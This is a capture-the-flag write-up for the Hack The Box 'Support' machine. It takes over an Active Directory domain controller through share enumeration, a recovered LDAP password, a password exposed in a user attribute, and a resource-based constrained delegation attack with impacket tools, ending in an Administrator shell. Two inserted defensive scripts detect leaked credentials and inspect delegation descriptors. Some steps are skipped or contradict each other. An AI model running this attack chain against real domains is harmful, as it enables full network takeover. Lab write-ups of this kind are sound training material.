┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49757/tcp open unknown syn-ack
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p53,135,139,445,464,593,636,3268,5985,49757 $ip -Pn -oN script-scan -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49757/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-05T22:01:48
|_ start_date: N/A
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
* Open TCP ports: 53, 135, 139, 445, 464, 593, 636, 3268, 5985, 9389, 49757 (88 and 389 also showed as open in the quick scan)
* Open UDP ports: 53, 88, 123, 389
* Services: DNS, RPC, SMB, NetBIOS, LDAP, Kerberos, WinRM
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U "%" $ip
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
I saved the share names to a file, then wrote a for loop to find the accessible shares:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cat list| awk '{print $1}' | tee -a share.list
ADMIN$
C$
IPC$
NETLOGON
support-tools
SYSVOL
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ for share in $(cat share.list);do echo "\n\tShare Name is: $share\n" && smbclient -N \\\\$ip\\$share;done
<snip>
Share Name is: support-tools
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
<snip>
I will mount the remote share on my Kali machine to navigate it more easily:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HTB/machines/Support/New]
└─$ sudo mount -t cifs "\\\\$ip\\support-tools" ./mnt
Password for root@\\10.10.11.174\support-tools:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cd mnt
┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ ls
7-ZipPortable_21.07.paf.exe WiresharkPortable64_3.6.5.paf.exe windirstat1_1_2_setup.exe
SysinternalsSuite.zip npp.8.4.1.portable.x64.zip
UserInfo.exe.zip putty.exe
The UserInfo.exe.zip file looks interesting, so I will copy it to a Windows machine.
I can say that it is a decryption function that recovers the password "securely" using Base64 encoding and an XOR operation, so I asked ChatGPT to rewrite this function in Python so I could run it on my host. Here is the code:
import base64

class Protected:
    # Both values are embedded in the binary; they are left as placeholders here.
    enc_password = "<encrypted>"
    key = "<key>".encode('ascii')

    @staticmethod
    def get_password():
        array = base64.b64decode(Protected.enc_password)
        array2 = bytearray(array)  # bytearray allows in-place modification
        for i in range(len(array)):
            # XOR each ciphertext byte with the repeating key byte and the constant 223 (0xDF)
            array2[i] = array[i] ^ Protected.key[i % len(Protected.key)] ^ 223
        return array2.decode('ascii')  # decode the bytearray to a string

# Usage example:
password = Protected.get_password()
print(password)
I created a zip file to upload to the BloodHound GUI after starting it:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ zip support.zip *.json
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:45250). It is available at http://localhost:7474
There may be a short delay until the server is ready.
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound
I ran a custom query in BloodHound to see which users can PSRemote to the machine:
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
I can also see that the support user exists from the rpcclient command.
I searched for this account in BloodHound and found that support is a member of Shared Support Accounts, which has GenericAll rights on DC.SUPPORT.HTB. GenericAll on a computer object lets us write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, i.e. configure resource-based constrained delegation (RBCD) from a computer account we control, so if I have the support account I can take over the DC.
I searched a lot for the ldapsearch syntax, as it was confusing for me, to pull information from LDAP about the support user:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ ldapsearch -H ldap://$ip -x -b "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB" -s sub "*" -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | tee -a support.output
<snip>
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
<snip>
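The password turned up in a free-text attribute that every authenticated domain user can read. As an added example (not code from the original writeup), the script below parses ldapsearch's LDIF output and flags password-looking values in the attributes where admins habitually stash credentials; the info/description pair is what this box exposed, the other attribute names and the password heuristic are my own generalization, and the sample LDIF is constructed (the support entry mirrors the output above, the ldap and backup entries are made up).

```python
import base64
import re

# Attributes where credentials habitually end up. info/description are what the
# ldapsearch output above exposed; the rest are added here as a generalization.
WATCHED_ATTRS = ("info", "description", "comment", "userpassword", "unixuserpassword")

# Heuristic for this example (not a standard): mixed case, a digit, no whitespace, 8+ chars.
PASSWORD_RE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)\S{8,}$")

# attr: value   or   attr:: base64value
ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?)\s*(.*)$")


def parse_ldif(text):
    """Parse ldapsearch LDIF output into a list of (dn, {attr_lower: [values]}).

    Handles folded continuation lines (leading space) and base64 values ('attr:: ...'),
    which is how ldapsearch prints non-ASCII or leading/trailing-space values."""
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    entries, attrs, dn = [], {}, None
    for line in unfolded + [""]:          # trailing "" flushes the last entry
        if line.startswith("#"):          # ldapsearch comment lines
            continue
        if not line:                      # blank line terminates an entry
            if dn is not None:
                entries.append((dn, attrs))
            attrs, dn = {}, None
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if name.lower() == "dn":
            dn = value
        else:
            attrs.setdefault(name.lower(), []).append(value)
    return entries


def find_credential_leaks(ldif_text):
    """Return (dn, attribute, value) for every watched attribute whose value looks like a password."""
    hits = []
    for dn, attrs in parse_ldif(ldif_text):
        for attr in WATCHED_ATTRS:
            for value in attrs.get(attr, []):
                if PASSWORD_RE.match(value):
                    hits.append((dn, attr, value))
    return hits


# Constructed sample in ldapsearch's LDIF layout; the support entry mirrors the page,
# the ldap and backup entries are made up for this example.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=support,DC=htb> with scope subtree

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: support
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb

# ldap, Users, support.htb
dn: CN=ldap,CN=Users,DC=support,DC=htb
sAMAccountName: ldap
description: Service account for the UserInfo tool

# backup, Users, support.htb
dn: CN=backup,CN=Users,DC=support,DC=htb
sAMAccountName: backup
description:: QmFja3VwMTIzNHBhc3M=

# search result
search: 2
result: 0 Success
"""

if __name__ == "__main__":
    for dn, attr, value in find_credential_leaks(SAMPLE_LDIF):
        print("%s  %s: %s" % (dn, attr, value))
```

Feed it the output of a subtree search over CN=Users (`ldapsearch ... -b "CN=Users,DC=support,DC=htb" "(objectClass=user)" info description comment`) rather than a single account; the heuristic is deliberately loose, so review the hits by hand.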
There is a value in the info field, so I tried to authenticate to the machine with it and got a hit :)
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u support -p 'Ironside47pleasure40Watchful'
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful
We knew from BloodHound that we can PSRemote as support, so I fired up evil-winrm and got a shell:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ evil-winrm -i $ip -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Documents>
*Evil-WinRM* PS C:\Users\support> type Desktop\user.txt
8959fba6ef693c03xxxxxxxxxxxxxx
User flag 8959fba6ef693c03xxxxxxxxxxxx
Privilege Escalation
The path to Domain Admin is obvious now. We can follow this post if we want to perform the attack from Linux:
We need a fake computer account and the name of the machine account whose attribute we can write.
The machine's name is DC$
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-addcomputer support.htb/support:'Ironside47pleasure40Watchful' -dc-ip $ip -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' -dc-ip $ip -action write -delegate-from 'ATTACK$' -delegate-to 'DC$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACK$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACK$ (S-1-5-21-1677581083-3380853377-188903654-5601)
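What impacket-rbcd actually wrote is a binary security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on DC$, with one ACCESS_ALLOWED_ACE naming ATTACK$. The following is an added example, not impacket's code: it builds that descriptor in pure Python with the same field values impacket-rbcd uses (owner BUILTIN\Administrators, DACL revision 4, full-control mask 0xF01FF; the byte order of the sections is my choice), and parses one back, which is what a defender does to see who may delegate to the DC. The ATTACK$ SID is the one from the output above.

```python
import struct

# Constants from the MS-DTYP security descriptor format.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4            # DACL revision impacket-rbcd writes
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF      # mask impacket-rbcd grants (983551)
OWNER_SID = "S-1-5-32-544"     # BUILTIN\Administrators, as impacket-rbcd sets the owner


def sid_to_bytes(sid):
    """Canonical 'S-1-5-21-...' string -> binary SID (revision, count, authority, subauthorities)."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")          # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, offset=0):
    """Binary SID at buf[offset:] -> (canonical string, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", buf, offset)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids):
    """Self-relative SD: one ACCESS_ALLOWED_ACE (full control) per SID, owner = BUILTIN\\Administrators."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size, then the access mask and the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: revision, sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(OWNER_SID)
    owner_off = 20                      # the SD header is 20 bytes
    dacl_off = owner_off + len(owner)   # group and SACL are absent (offset 0)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner + dacl


def parse_rbcd_sd(blob):
    """Return [(sid, mask)] for every ACCESS_ALLOWED_ACE in the DACL; [] if there is no DACL."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
    pos = dacl_off + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(blob, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size                 # skip unknown ACE types by their declared size
    return allowed


if __name__ == "__main__":
    attacker = "S-1-5-21-1677581083-3380853377-188903654-5601"   # ATTACK$ from the rbcd output
    sd = build_rbcd_sd([attacker])
    print(len(sd), sd.hex())
    print(parse_rbcd_sd(sd))
```

Any non-empty value of this attribute on a domain controller's computer object is worth an alert: pull it with ldapsearch, run parse_rbcd_sd over the raw bytes, and resolve each SID; a freshly created machine account such as ATTACK$ (high RID, created by a low-privileged user) is exactly the pattern this box demonstrates.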
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-getST -spn 'cifs/DC.SUPPORT.HTB' -impersonate Administrator -dc-ip $ip 'support.htb/ATTACK$:AttackerPC1!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ export KRB5CCNAME=$(pwd)/Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache
The ticket is bound to the service name in the SPN, so Impacket tools using this cache (-k -no-pass) must be pointed at dc.support.htb (mapped to $ip in /etc/hosts), not at the IP address.
For some reason, I couldn't connect with psexec.py or dump hashes with secretsdump.py, so I switched to crackmapexec.
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-psexec support.htb/administrator@$ip -hashes :bb06cbc02b39abedddxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file bNtWYSHx.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service yBfc on 10.10.11.174.....
[*] Starting service yBfc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
e99ab2203321xxxxxxxxxxxxxxxx